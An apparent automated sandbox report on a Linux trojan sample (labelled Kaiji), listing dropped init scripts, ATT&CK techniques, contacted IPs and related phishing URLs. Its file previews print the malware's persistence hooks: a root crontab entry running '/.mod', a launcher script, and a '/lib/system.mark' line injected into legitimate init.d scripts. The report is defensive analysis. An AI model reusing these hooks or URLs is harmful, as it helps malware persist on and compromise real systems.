Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/saned	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/udev	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/x11-common	Jump to dropped file
Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	File: /etc/init.d/dns-udp4	Jump to dropped file

Source: sBKWt6JPZa.elf

Submission file: segment LOAD with 7.9221 entropy (max. 8.0)

Source: /usr/sbin/cron (PID: 5478)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/sbin/cron (PID: 5561)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/sbin/cron (PID: 5625)	Sleeps longer then 60s: 60.0s	Jump to behavior

Source: /tmp/sBKWt6JPZa.elf (PID: 5409)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5414)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5425)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5429)	Queries kernel information via 'uname':	Jump to behavior
Source: /.mod (PID: 5548)	Queries kernel information via 'uname':	Jump to behavior
Source: /.mod (PID: 5612)	Queries kernel information via 'uname':	Jump to behavior

Source: open-vm-tools.14.dr	Binary or memory string: # Check if we're running inside VMWare
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null \|\| exit 1
Source: open-vm-tools.14.dr	Binary or memory string: if ! ${checktool} \| grep -iq vmware; then
Source: open-vm-tools.14.dr	Binary or memory string: rm -f /var/run/vmtoolsd.pid
Source: open-vm-tools.14.dr	Binary or memory string: checktool='vmware-checkvm'
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Stopping open-vm guest daemon" "vmtoolsd"
Source: open-vm-tools.14.dr	Binary or memory string: echo "open-vm-tools: not starting as this is not a VMware VM"
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd -- --background /var/run/vmtoolsd.pid \|\| exit 2
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Starting open-vm daemon" "vmtoolsd"
Source: open-vm-tools.14.dr	Binary or memory string: status_of_proc -p /var/run/vmtoolsd.pid /usr/bin/vmtoolsd vmtoolsd && exit 0 \|\| exit $?

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	1 Hide Artifacts	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File and Directory Permissions Modification	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
sBKWt6JPZa.elf	24%	ReversingLabs	Linux.Trojan.Kaiji

Dropped Files

Source	Detection	Scanner
/.mod	0%	ReversingLabs
/etc/init.d/acpid	0%	ReversingLabs
/etc/init.d/alsa-utils	0%	ReversingLabs
/etc/init.d/anacron	0%	ReversingLabs
/etc/init.d/apparmor	0%	ReversingLabs
/etc/init.d/avahi-daemon	0%	ReversingLabs
/etc/init.d/bluetooth	0%	ReversingLabs
/etc/init.d/console-setup.sh	0%	ReversingLabs
/etc/init.d/cups	0%	ReversingLabs
/etc/init.d/cups-browsed	0%	ReversingLabs
/etc/init.d/dbus	0%	ReversingLabs
/etc/init.d/dns-udp4	0%	ReversingLabs
/etc/init.d/irqbalance	0%	ReversingLabs
/etc/init.d/keyboard-setup.sh	0%	ReversingLabs
/etc/init.d/kmod	0%	ReversingLabs
/etc/init.d/rsync	0%	ReversingLabs
/etc/init.d/saned	0%	ReversingLabs
/etc/init.d/screen-cleanup	0%	ReversingLabs
/etc/init.d/spice-vdagent	0%	ReversingLabs
/etc/init.d/ufw	0%	ReversingLabs
/etc/init.d/unattended-upgrades	0%	ReversingLabs
/etc/init.d/uuidd	0%	ReversingLabs
/etc/profile.d/bash.cfg.sh	0%	ReversingLabs

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.google.com	142.250.186.132	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	sBKWt6JPZa.elf, 5404.1.00000000008ad000.0000000000935000.rw-.sdmp	false		unknown
http://upx.sf.net	sBKWt6JPZa.elf	true	URL Reputation: safe	unknown
http://.css	sBKWt6JPZa.elf, 5404.1.00000000008ad000.0000000000935000.rw-.sdmp	false		unknown
http://.jpg	sBKWt6JPZa.elf, 5404.1.00000000008ad000.0000000000935000.rw-.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
27.30.77.93	unknown	China		4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.google.com	https://guillaumerobin.com/djvjnvdjndjvjnjnvjnvdjn.html	Get hash	malicious	Unknown	Browse	172.217.16.196
	http://Evie.nativeroads.net/open.aspx?ffcb10-fec7157773620479-fe5117777c63077b7210-fe3b11727364047e711470-ff981172-fe4910787d620d747112-ff61137775&d=120023&bmt=0	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	142.250.186.36
	https://app.transferrocket.io/downloads/4229c91d-a4b1-46dc-8673-891ca0a0c503	Get hash	malicious	HTMLPhisher	Browse	142.250.186.164
	https://business.peppercontent.io/items/1Mg4gaZkory	Get hash	malicious	Unknown	Browse	172.217.18.4
	Poeschl-tobacco_reff_83923837701912].htm	Get hash	malicious	Phisher	Browse	216.58.206.36
	http://44.221.84.105	Get hash	malicious	Unknown	Browse	142.250.185.100
	https://veryfast.io	Get hash	malicious	Unknown	Browse	142.250.185.100
	https://u47624652.ct.sendgrid.net/ls/click?upn=u001.dadsJCAJAl1i2Wyni-2FqIpB7JUgY2pex5g8M-2FhOTGFFHwo5sWgFDjcqy2L0OmonoaOFxcTz7SSB9Zef6mGbvSbZAXZK2FNhcmYdYC1XfrewJRXTzEzFwzmIj8nJoazHaAQVwyvlny49OkXm-2FDzbhWD3cqi52XZmuHNJ5erV06gLBXVvtoQCYY0OMkrHePY-2F9kOmRiOc8fRxBlNxNWWJDbU4O9z5P8IfXhDPiFYyln4kg-3DMEyt_ta3c1LGL-2F0rVfKZ7mVrwN6xsF1Wes8l2L7kiutKf8O1vhXHOMQAk657ifMzrLT5hR0wjO0bDDWiSyPYBMWem2YqbQ4hjbtaf8R6UfuK7GvGuvaOArNf0yRKKyAsKfoVrlXUbmkgYGBk7NXAN8n11wXOM8RDTicUs3dK12Mnhp63jlPtSTpECLklTQMdoXlI5m8IncC-2BD2wJgWDFrBq8JEg-3D-3D	Get hash	malicious	HTMLPhisher	Browse	142.250.186.100
	https://veryfast.io	Get hash	malicious	Unknown	Browse	142.250.181.228
	http://marylandez.com	Get hash	malicious	Unknown	Browse	142.250.181.228

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CHINANET-BACKBONENo31Jin-rongStreetCN	na.elf	Get hash	malicious	Mirai	Browse	110.90.175.227
	na.elf	Get hash	malicious	Mirai	Browse	182.144.64.166
	na.elf	Get hash	malicious	Mirai	Browse	118.239.230.202
	na.elf	Get hash	malicious	Mirai	Browse	106.119.232.203
	na.elf	Get hash	malicious	Mirai	Browse	118.239.189.208
	na.elf	Get hash	malicious	Mirai	Browse	182.108.48.1
	na.elf	Get hash	malicious	Mirai	Browse	183.153.79.195
	na.elf	Get hash	malicious	Mirai	Browse	113.76.81.190
	na.elf	Get hash	malicious	Mirai	Browse	171.222.69.201
	na.elf	Get hash	malicious	Mirai	Browse	106.119.232.231

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/acpid	libgdi.so.0.8.2.elf	Get hash	malicious	Unknown	Browse
	execute_and_cleanup.sh	Get hash	malicious	Unknown	Browse
	0S3wxWer8x.elf	Get hash	malicious	Unknown	Browse
	ausNOyj9by.elf	Get hash	malicious	Unknown	Browse
	W4bP4K6GeP.elf	Get hash	malicious	Unknown	Browse
	HvuWdJQMCR.elf	Get hash	malicious	Unknown	Browse
	Vij3FJ8y4o.elf	Get hash	malicious	Unknown	Browse
/.mod	libgdi.so.0.8.2.elf	Get hash	malicious	Unknown	Browse
	execute_and_cleanup.sh	Get hash	malicious	Unknown	Browse
	0S3wxWer8x.elf	Get hash	malicious	Unknown	Browse
	ausNOyj9by.elf	Get hash	malicious	Unknown	Browse
	W4bP4K6GeP.elf	Get hash	malicious	Unknown	Browse
	HvuWdJQMCR.elf	Get hash	malicious	Unknown	Browse
	Vij3FJ8y4o.elf	Get hash	malicious	Unknown	Browse
	adm64	Get hash	malicious	Unknown	Browse

Created / dropped Files

/.mod

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.9931325576478587
Encrypted:	false
SSDEEP:	3:TKH/LQP5r:8M1
MD5:	77037D22D4F473F068BCE3E3318ACB01
SHA1:	8AB05FF9A8D9D73E2B23643B39D67EA1FF7A6418
SHA-256:	2F34A08D31571167FB11C6BA96496246219E44403A091B7F010B4C5559CB542B
SHA-512:	AE29513E81C527D8D27EF4CFE69E8D357632BA9AD944F7634D638DA486F8ABBDBD3181164C297A2AA3053D2BA46A5FB19471B5E809D2BB52996E4E2D312DF334
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: libgdi.so.0.8.2.elf, Detection: malicious, Browse Filename: execute_and_cleanup.sh, Detection: malicious, Browse Filename: 0S3wxWer8x.elf, Detection: malicious, Browse Filename: ausNOyj9by.elf, Detection: malicious, Browse Filename: W4bP4K6GeP.elf, Detection: malicious, Browse Filename: HvuWdJQMCR.elf, Detection: malicious, Browse Filename: Vij3FJ8y4o.elf, Detection: malicious, Browse Filename: adm64, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/bash./usr/lib/libgdi.so.0.8.2

/etc/.cfg

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	171
Entropy (8bit):	3.7956707768907574
Encrypted:	false
SSDEEP:	3:0dkTLQKTBWTsbGqdtbGqYwSkTLQKTBWTsbGqdtbGqYwZWNUdYXRGXGOaYXRGXBHo:0d4MIBVD3DYwS4MIBVD3DYwiUgRGWARB
MD5:	9EE2D3AB519A9B89683C67B33975BF8F
SHA1:	E8CE7CB9A498D2B8BAC8201D91FBDD772625ED67
SHA-256:	4A85021B877364FBC90469A83BF87881C51F53A881ED4E1A039CC1608998FE3C
SHA-512:	1BF46D5DFE5C6F6CE83180F12687E37AEBB63CA2380E0E7D8A4BFA21782FAFAB1DA7A7CF0FFD2CA54464E9415E283BB543656EEA6AD3D4A65C15406EA2472DE7
Malicious:	false
Reputation:	low
Preview:	e464ed5cf25f2df1d063c362c10739c0e263c362c10739c0e263f618.e464ed5cf25f2df1d063c362c10739c0e263c362c10739c0e263f618.e74ed74ec12818ace24ce20ec12818ace24ce20edf3910f0fd588618.

/etc/crontab

Download File

Process:	/bin/bash
File Type:	ASCII text
Category:	dropped
Size (bytes):	24
Entropy (8bit):	3.000961982762677
Encrypted:	false
SSDEEP:	3:HFdtKeIBFv:l6eIBV
MD5:	6B13F24B625DC5B832A4AE80CFAB7DDA
SHA1:	8D0BAF4556328F9CEFB4041D67CB6BF30570AF84
SHA-256:	AC95234D459AA020883AF0A93879C835582CB60D7DD63C68F33993BA2546661F
SHA-512:	76774BF236D5DB77B09BFD2A36F190B86AC7DA7147C635CAF06A1884E151345585803885AD1FCBD60F566A48F165CBF8B445B506047CBC0A9924BF79B4C8E289
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/1 * * * root /.mod .

/etc/init.d/acpid

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2304
Entropy (8bit):	5.101745776620701
Encrypted:	false
SSDEEP:	48:9tdVEA2+3MPMiOBdxAEGbsbcq1himLHLHmvgjWL:9tdVEA2+3MPi90Qbcq1Q4Hrmvt
MD5:	6BBECC4CA13C3007B79B315AD5B8EB33
SHA1:	E32443A6D19709D269DFD58D5D48F23192F8ED82
SHA-256:	98C12A01C2E5F562B14E931C9B503824429C82E088BA06BA43A6313565DB15DE
SHA-512:	29E15DE525FB44D5823429C80280CBF91592A546A5778EA6C056DFE7A390C4DEC2381D22649A110D14DD732473BB9BA7C43D482BAE2E7315120AE8BF9AFE502B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: libgdi.so.0.8.2.elf, Detection: malicious, Browse Filename: execute_and_cleanup.sh, Detection: malicious, Browse Filename: 0S3wxWer8x.elf, Detection: malicious, Browse Filename: ausNOyj9by.elf, Detection: malicious, Browse Filename: W4bP4K6GeP.elf, Detection: malicious, Browse Filename: HvuWdJQMCR.elf, Detection: malicious, Browse Filename: Vij3FJ8y4o.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: acpid.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# X-Start-Before: kdm gdm3 xdm lightdm.# X-Stop-After: kdm gdm3 xdm lightdm.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: Start the Advanced Configuration and Power Interface daemon.# Description: Provide a socket for X11, hald and others to multiplex.# kernel ACPI events..### END INIT INFO..set -e..ACPID="/usr/sbin/acpid".DEFAULTS="/etc/default/acpid"..# Check for daemon presence.[ -x "$ACPID" ] \|\| exit 0..OPTIONS="".MODULES="".# Include acpid defaults if available.[ -r "$DEFAULTS" ] && . "$DEFAULTS"..# Get lsb functions.. /lib/lsb/init-functions..# As the name says. If the kernel supports modules, it'll try to load.# the ones listed in "MODULES"..load_modules() {. [ -f /proc/modules ] \|\| return 0. if [ "$MODULES" = "all" ]; then./lib/system.mark. MODULES="$(sed -rn 's#^(/lib/mod

/etc/init.d/alsa-utils

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	5694
Entropy (8bit):	5.4216099972768905
Encrypted:	false
SSDEEP:	96:iKtDd9/iwtDaLE+E9nw3mFRzF+rv17AypQyhHk5eEkv:iCdld6E+UnKeRB+rv1cyOyZkq
MD5:	25EEDDA5AB2F0AF6683A5A1365EF11A0
SHA1:	76963A11F9F43D6BC6336B0A9610C8668E0F3E79
SHA-256:	37AAA474A96690F2C8BCAD49AB3E31D59D2E4749E2C3EEF7AFCB82406DF6FD81
SHA-512:	3D89F435223BC02FC71722A6FC3A256F30A15168A45DD239B28144593E66653DF43C8F2B0CBFF57BB432D68B26F98173B5F19A2EC6D4D319EDB76994902374CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	#!/bin/sh.#.# alsa-utils initscript.#.### BEGIN INIT INFO.# Provides: alsa-utils.# Required-Start: $local_fs $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Restore and store ALSA driver settings.# Description: This script stores and restores mixer levels on.# shutdown and bootup.On sysv-rc systems: to.# disable storing of mixer levels on shutdown,.# remove /etc/rc[06].d/K50alsa-utils. To disable.# restoring of mixer levels on bootup, rename the.# "S50alsa-utils" symbolic link in /etc/rcS.d/ to.# "K50alsa-utils"..### END INIT INFO..# Don't use set -e; check exit status instead..# Exit silently if package is no longer installed.[ -x /usr/sbin/alsactl ] \|\| exit 0..PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin.MYNAME=/etc/init.d/alsa-utils.ALSACTLHOME=/run/alsa..[ -d "$ALSA

/etc/init.d/anacron

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2124
Entropy (8bit):	4.763929127414264
Encrypted:	false
SSDEEP:	24:aiF8WzzU+LuN5K6YqfO05i1CPeueczZR11s+M8k93ILlfdW6910kF4T0Op:7RzgTNNOGi1eTrzZR1vX5fsKX00+
MD5:	816D2CB2EBBEA0A92840D29E03A3AEF2
SHA1:	DE872E6EAA118E80E9D7A3D1B0CA7C73FD30CB49
SHA-256:	2822A1618EEFA229CB29520923C7E47B61981E11D2028CD62611B18BCE215B87
SHA-512:	5BD322EA5D511EA3A5C7AB832FCCB7DA138C4E352CCD5A140F783B4E196A5C2A0FA33D5DFB54C353A15ADEF42E507D076E66C3C3546EE1E70F538EDA7E52EB7E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: anacron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Run anacron jobs.# Description: The first purpose of this script is to run anacron at.# boot so that it can catch up with missed jobs. Note.# that anacron is not a daemon. It is run here just once.# and is later started by the real cron. The second.# purpose of this script is that said cron job invokes.# this script to start anacron at those subsequent times,.# to keep the logic in one place..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin..test -x /usr/sbin/anacron \|\| exit 0.test -r /etc/default/anacron && . /etc/default/anacron... /lib/lsb/init-functions..case "$1" in. start). if init_is_upstart 2>/dev/null; then./lib/system.mark. exit 1. fi. log_daemon_msg "Starting

/etc/init.d/apparmor

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3826
Entropy (8bit):	5.2527487182090535
Encrypted:	false
SSDEEP:	96:RFCjnn83hjzYn1zJNSNuDNBqNPoNpDbANEFygG9M3zR4hszR4hxRl:Wjn4hjUD9dwl
MD5:	026032FB398BC8D223FFFAC164EC8BDC
SHA1:	2804934FD92CE102B1B64E908DE69B93BDAF0F62
SHA-256:	7EBDBADE1AA7BE3A53549975CD202067C822B137898B91AEE8148A96B80B82D5
SHA-512:	CAD3D3A4EBC3B0B3707B2B8FA5D301F0A8FEFBE78D7064B096A746AB2C0957B2AF29CA4BAFB4603EF0C80380EBC5AD40A7030C7B49BF62164B9DAFECD2C8CFB5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# ----------------------------------------------------------------------.# Copyright (c) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007.# NOVELL (All rights reserved).# Copyright (c) 2008, 2009 Canonical, Ltd..#.# This program is free software; you can redistribute it and/or.# modify it under the terms of version 2 of the GNU General Public.# License published by the Free Software Foundation..#.# This program is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with this program; if not, contact Novell, Inc..# ----------------------------------------------------------------------.# Authors:.# Steve Beattie <steve.beattie@canonical.com>.# Kees Cook <kees@ubuntu.com>.#.# /etc/init.d/app

/etc/init.d/apport

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3050
Entropy (8bit):	5.219163763155702
Encrypted:	false
SSDEEP:	48:jV/OxxHuoBusZABLm/tiUmZdWEdBuSZWg/e/fupMWDGdxboGxz5:jV/OxNDBusZABLm1BmyEbuSZWg2/TWOT
MD5:	8669B5F957342072FF16241BEAA010FD
SHA1:	2E45CEA64AEE1115B5EDBAAC7407B340E47EC7C1
SHA-256:	4DE7B672D754167242FEB9A95D9FA35514114948CFD3567B8BB8BF294F38FB17
SHA-512:	4F426321E4A7123B6E0B19DEF3455CEACBA152FCB5F21A106B809F3B2FB2054300F391DEE9E498749544ED22C8B351AD5E35658813209917672052988D21DF8F
Malicious:	true
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: apport.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: automatic crash report generation.### END INIT INFO..DESC="automatic crash report generation".NAME=apport.AGENT=/usr/share/apport/apport.SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$AGENT" ] \|\| exit 0..# read default file.enabled=1.[ -e /etc/default/$NAME ] && . /etc/default/$NAME \|\| true..# Define LSB log_* functions..# Depend on lsb-base (>= 3.0-6) to ensure that this file is present... /lib/lsb/init-functions..#.# Function that starts the daemon/service.#.do_start().{..# Return..# 0 if daemon has been started..# 1 if daemon was already running..# 2 if daemon could not be started...[ -e /var/crash ] \|\| mkdir -p /var/crash..chmod 1777 /var/crash...# check for kernel crash dump, convert it to apport report..if [ -e /var/crash/vmcore ] \|\| [ -n "`ls /va

/etc/init.d/avahi-daemon

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2453
Entropy (8bit):	4.853742484748698
Encrypted:	false
SSDEEP:	48:9s2V+ig+Ui83MZoJQukTSiVC2/uldA0uv3uKv2ZsGyjyRfg/zsDE7Ed:93oijU4ukTSCu40uv3uKvdJOR4ADHd
MD5:	D6F4FB4B6543A32644DC249C8B6D17A0
SHA1:	C5E44B40458D426759A7EB88B4E55C3ACEF94077
SHA-256:	05EF48FCD09FA3D2BC5C5297F0C9852810F8CBECEA65B0ED26A980D4A5F9D387
SHA-512:	06573A9DC46732518C4BAC856AA7C47B67CB0612BAC0192312A95699DF090782F457EBD138FCD6AE9858F8359209A54EC020115E1EFE450C2EA68D47E4554D30
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: avahi avahi-daemon.# Required-Start: $remote_fs dbus.# Required-Stop: $remote_fs dbus.# Should-Start:. $syslog.# Should-Stop: $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Avahi mDNS/DNS-SD Daemon.# Description: Zeroconf daemon for configuring your network .# automatically.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC="Avahi mDNS/DNS-SD Daemon".NAME="avahi-daemon".DAEMON="/usr/sbin/$NAME".SCRIPTNAME=/etc/init.d/$NAME..# Gracefully exit if the package has been removed..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Include avahi-daemon defaults if available..test -f /etc/default/avahi-daemon && . /etc/default/avahi-daemon..DISABLE_TAG="/var/run/avahi-daemon/disabled-for-unicast-local"..#.# Function that starts the daemon/service..#.d_start() {. $DAEMON -c && return 0.. if [ -e $DISABLE_TAG -a "$AVAHI_DAEMON_DETECT_LOCAL" !=

/etc/init.d/binfmt-support

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	5.05188801367894
Encrypted:	false
SSDEEP:	24:ai3V6yXngSBVSBNyj6edNHcBcNlekvx2w5mw+76opC:73ZngWVWNMNH0YlbJ2w4wrJ
MD5:	E6D454B5675D599827B9892551BAF33F
SHA1:	FC529362E60C9D6B0DC86779CFA890B6621FD11E
SHA-256:	37F47BEF4B4D1021E5FDC6BD2F4E90FA9BA3175A83DB2BE094EF68F50A07828B
SHA-512:	3752D5178841DDD8FB9F09BDA4EB0D2FA4391BB951273B3911347AC93135E9A516919E28487724371F6A7CE689BAA053855A3219FC68944751313B0405BA48DE
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: binfmt-support.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Support for extra binary formats.# Description: Enable support for extra binary formats using the Linux.# kernel's binfmt_misc facility..### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=binfmt-support.DESC="additional executable binary formats"..if [ "$(uname)" != Linux ]; then./lib/system.mark. exit 0.fi..which update-binfmts >/dev/null 2>&1 \|\| exit 0... /lib/lsb/init-functions.[ -r /etc/default/rcS ] && . /etc/default/rcS..set -e.CODE=0..case "$1" in. start). log_daemon_msg "Enabling $DESC" "$NAME". update-binfmts --enable \|\| CODE=$?. log_end_msg $CODE. exit $CODE. ;;.. stop). log_daemon_msg "Disabling $DESC" "$NAME". update-binfmts --disable \|\| CODE=$?. log_end_msg $CODE. exi

/etc/init.d/bluetooth

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3071
Entropy (8bit):	5.405379841493847
Encrypted:	false
SSDEEP:	48:71OoPrcMbC/BUUzGrm92+kbM9A5LmiEQoOZoKkkFoM+Zh9YkFoMr4Ote:79TcWC/BUeem92R4q5LRPt5w9VplA
MD5:	85F7B5D11EBD6ABDA86B5DF999F8B6D6
SHA1:	898A95C0302A0D24763D2B10EDC21E921564B1C8
SHA-256:	5A23A691BEE3E1D9A1723811D45030CCAD72CDFDA4AF1C1B5BEC6C027F8831D3
SHA-512:	9BED1FAE531015163C3665B24B678AEA239EC8FA6F92E06CCD044AEAF1B490251B5D7196876FAF1E8C3F2C73E208E268BF9DB6EC9B0535FC7CABA5DC6542F692
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: bluetooth.# Required-Start: $local_fs $syslog $remote_fs dbus.# Required-Stop: $local_fs $syslog $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Start bluetooth daemons.### END INIT INFO.#.# bluez Bluetooth subsystem starting and stopping.#.# originally from bluez's scripts/bluetooth.init.#.# Edd Dumbill <ejad@debian.org>.# LSB 3.0 compilance and enhancements by Filippo Giunchedi <filippo@debian.org>.#.# Updated for bluez 4.7 by Mario Limonciello <mario_limonciello@dell.com>.# Updated for bluez 5.5 by Nobuhiro Iwamatsu <iwamatsu@debian.org>.#.# Note: older daemons like dund pand hidd are now shipped inside the.# bluez-compat package..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC=bluetooth..DAEMON=/usr/sbin/bluetoothd.HCIATTACH=/usr/bin/hciattach..BLUETOOTH_ENABLED=0.HID2HCI_ENABLED=1.HID2HCI_UNDO=1..SDPTOOL=/usr/bin/sdptool..# If you want to be ignore error of "org.freedesktop.hostname1",.# please en

/etc/init.d/console-setup.sh

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1301
Entropy (8bit):	4.338919117179571
Encrypted:	false
